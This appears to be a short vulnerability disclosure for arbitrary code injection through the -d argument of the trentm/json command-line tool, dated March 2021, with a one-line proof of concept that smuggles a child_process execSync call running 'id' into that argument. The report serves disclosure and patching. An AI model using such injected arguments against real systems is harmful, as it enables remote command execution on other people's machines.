Code Injection in trentm/json

Valid

Reported on

Mar 31st 2021


✍️ Description

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the -d argument.

🕵️‍♂️ Proof of Concept

curl -sL 'https://api.github.com/repos/joyent/node/issues?state=open' | node_modules/json/lib/json.js -a created_at number title -d '""+require(`child_process`).execSync(`id`)//'

💥 Impact

This vulnerability is capable of injecting arbitrary commands, which leads to RCE.

Occurrences

to join this conversation